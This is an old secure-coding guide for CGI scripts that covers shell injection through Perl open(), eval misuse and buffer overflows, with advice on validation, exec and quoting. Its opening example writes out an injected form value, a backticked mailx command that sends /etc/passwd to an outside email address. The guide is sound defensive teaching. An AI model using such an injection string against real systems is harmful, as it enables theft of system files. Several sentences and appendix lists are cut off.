[Because we need to use all of the different quote characters within many
of the examples, literal strings are not surrounded by quotes;
instead user-input strings are shown in a
and program strings are shown with a
background and green text.]
Appendix A: Dangerous Characters
Appendix B: Unsafe Operations
Appendix C: Unsafe Library Functions
We'll start with a few examples of how you can get into trouble. This
bit of perl code is intended to search for
files in a specific directory and find any that match a user-provided
open("/bin/ls /data/cardfiles | grep $searchspec |");
Suppose the user enters one of the following onto the form for the above
/bin/ls /data/cardfiles | grep blah `/bin/mailx -s anothervictim email@example.com < /etc/passwd`
Most examples of security problems in CGIs can be traced to the fact that
a shell is unexpectedly started and handed some data from the HTML form.
And in almost every case, the shell is started simply as a convenient way
to start some other outside program. (Our examples focus on just one way
this can happen, a list of possible trouble spots are found in
This brings us to one of the most important recommendations here:
Avoid starting external programs where
It is always best if you can build all of the needed
functionality into your CGI. Even if you start the external program
in a secure
way, it's possible that the external program could manage to do something
insecure that you didn't expect.
But sometimes you have to start external programs. Can it be done securely?
The best way to do this is to make sure the user data is clean of any
trouble. In fact, the best way to make any CGI secure is to completely
isolate the input data from any possible abuse.
Suppose a field on the form has just three possible values, Yes, No, and
Maybe. You could simply compare the input value to each of these three
values, and if doesn't match, you immediately generate an error and give up.
If there is an exact match, then you know the value is completely safe to
As an aside, you can't rely on the HTML form to provide this constraint.
If you have a pulldown menu that contains a list of values, it is still
possible for a malicious user to submit other values you don't list.
They can simply copy your HTML form, and edit the values; this will work
for both the GET and POST methods. Also note that a malicious user can
simply encode things directly in the URL for use with the GET method,
and because of how most CGI libraries work, it will probably work even
if the author was originally using POST.
Unfortunately it is not always possible to constrain your input so tightly.
For instance in a search form, you usually can't predict every reasonable
search term in advance. If you can't constrain the input, and you have to
start an outside program, your best bet is to avoid using the shell
to start the outside program.
If you are just
starting the outside program, and the current one is finished, you can just
use exec(), which replaces the current program with the new one. This
command exists (in one form or another) in shell, perl, and C (note that
care must be used in perl; see Appendix B).
In all three languages, you'll be protected from immediate harm (but you still
have to worry about what the new program does with the data). But if you
are opening a pipe to a command (as in the first example), then coding this
is a bit trickier. You need to understand pipe(), fork(), and exec(),
and a complete description is beyond the scope of this article. Perl will
do a fork() and exec() for you with the system() function (note that this
doesn't set up piped I/O), however care
must be taken to use the correct form, otherwise a shell may still be
used. For more on this, see the line item for the system() function in
Appendix B, in the perl section.
If you aren't a system programmer, or if you have particularly complex
file redirection needs, then it may be difficult to avoid the temptation
to let the shell start your external program. Even if you do use exec,
if you don't control the sources to the outside program, you still aren't
protected. So what else can we do to stay safe?
An adequate (but not great) solution is to attempt to strip out all of the
dangerous characters. The problem with this is that the list is long,
and you might miss something. Worse, which characters are dangerous depends
on exactly what you are doing, and which language(s) you are working with.
Consider this example:
open("grep $name /data/phonebook |");
If you can identify every dangerous character and strip them out, that's
great. In some cases, you can even simply limit the input to alphanumerics,
which will provide good protection. But suppose the input is supposed to
include some of these dangerous characters? If you can't filter them out,
the next best thing is to quote the characters so that they won't
be dangerous anymore:
open("grep '$name' /data/phonebook |");
A simpler way to handle quoting is to use a backslash in front of
each problem character, because
it's a more consistent approach (there's no bizarre exception like quoting
the single quote above). You just have to remember to backslash
everything that might be a problem (See Appendix A).
In many cases, you can even put a backslash in front of every
character (including normal characters) and get the protection you
want without causing any problems. Again though, if the string goes
through additional evaluations, you have to add quoting for each evaluation,
and this becomes very complex (2n-1 backslashes are needed)
Note that with perl, if there are no shell special characters in an
open command, then it won't use the shell to interpret the command.
Unfortunately backslashses are not counted as special characters, so
if you protect through backslashing, the backslashes may not be
stripped depending on how perl choses to execute it. And, you can't
rely on perl not using the shell, because if user input contains
special characters, then it may behave differently than it does in
That about covers all the different approaches to making yourself safe from
shells. But this is only one way in which you can get into trouble.
Any interpreted language can expose the input string to unexpected
Normally, in interpreted languages, simply having the information stored
in a variable offers some protection from problems. For instance,
$total = $input*1.15 + 37.50;
can not be subverted by putting
dangerous characters into the $input variable, because
when perl replaces the variable with its value, it has already finished
with checking for backticks and things like that. This is also true if
is your scripting language. However, both of these
languages have an eval statement, which causes a second pass of evaluation
to occur. Here's an example of how this can be handy. Part of the
user input involves selecting a sorting function, which is stored in the
@newlist = eval sort $howsort @oldlist;
Compiled languages that use the C library functions suffer from a problem
of their own. Because many of the library functions don't do bounds
checking on input strings, it is possible to overflow a buffer while
reading input, and overwrite the stack, and cause the program to execute
machine code that was supplied by the user. So a user can send arbitrarily
long query strings to your program, hoping to overflow the buffer and
run something of their own. Contrary to popular belief, access to source
code is not required, the evildoer just has to keep trying different length
This problem can be avoided by taking care to not let buffers overflow.
If you are using read() in loop, just add an exit condition for hitting
the end of the buffer. For the library functions, there are safe forms
of most functions. Even if there aren't, you only have to check that
a string is short enough before using it in an unsafe function.
Appendix C lists some unsafe functions, and their
Even if you avoid all of the above general case pitfalls, there's
still room for evil to occur. There are a great number of
application-specific holes that you could leave if you aren't careful.
Here's some examples:
Appendix B: Possibly Unsafe Operations
The following problems should NOT be considered an exhaustive
Simply using these functions doesn't make you safe, you have to make sure
the size limits you use are set to match the buffer sizes you have (minus
one, usually). For example, it is tempting to use read or fread (not
listed here because they're generally safe), with the size set to the
value from the Content-Length HTTP field, but this can lead to buffer